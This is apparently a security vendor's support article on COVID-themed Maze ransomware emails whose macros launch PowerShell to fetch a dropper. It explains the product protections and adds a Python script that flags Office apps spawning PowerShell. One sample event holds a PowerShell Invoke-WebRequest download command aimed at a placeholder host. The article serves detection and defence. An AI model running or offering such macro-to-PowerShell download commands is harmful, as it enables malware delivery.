Issue:
The security company CSIS has informed us that there is a brand new ransomware out now in the 'Maze' family, which takes advantage of the coronavirus fear, and the hackers are approaching users through emails with a new cure for COVID-19. If the document is opened and a macro is allowed / executed, a PowerShell script will be run which will fetch a dropper with 'Maze' at various HTTP addresses.
Are we protected from this new threat?
Resolution:
Our security products can help at a few stages to prevent the ransomware attack. First, we have a generic detection for document files containing malicious macros, which stops the infection vector. If a document still slips past that detection, our DeepGuard engine can detect the suspicious behaviour of the document executing a PowerShell script and block the script execution attempts. Additionally, our ongoing effort to block malicious URLs related to malware attacks can prevent the ransomware from fetching the dropper or next stages. Lastly, we also have coverage for the Maze ransomware IOCs that have been found or reported, and they should be detected by our antivirus engine.
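For teams that want to check their own endpoint telemetry for the behaviour described above (an Office document launching PowerShell that reaches out to an HTTP address), the following is an added example, not DeepGuard's logic or any product's code. The event field names, the process lists and the sample events are assumptions constructed for illustration.

```python
import re

# Assumed process lists: Office hosts that run macros, and PowerShell binaries.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def triage(events):
    """Flag process-creation events where an Office app spawns PowerShell.

    Severity is 'high' when the command line also carries an HTTP(S) URL,
    which matches the download stage; otherwise 'medium'.
    """
    findings = []
    for ev in events:
        parent = basename(ev["parent_image"])
        child = basename(ev["image"])
        if parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN:
            urls = URL_RE.findall(ev["command_line"])
            findings.append({
                "host": ev["host"],
                "parent": parent,
                "urls": urls,  # candidates to compare against URL blocklists
                "severity": "high" if urls else "medium",
            })
    return findings


# Constructed sample events (field names are hypothetical, hosts are placeholders).
SAMPLE_EVENTS = [
    {"host": "pc-01", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -NoProfile -Command "Invoke-WebRequest http://files.example.test/update.bin"'},
    {"host": "pc-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"host": "pc-03", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```
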
Article no: 000022435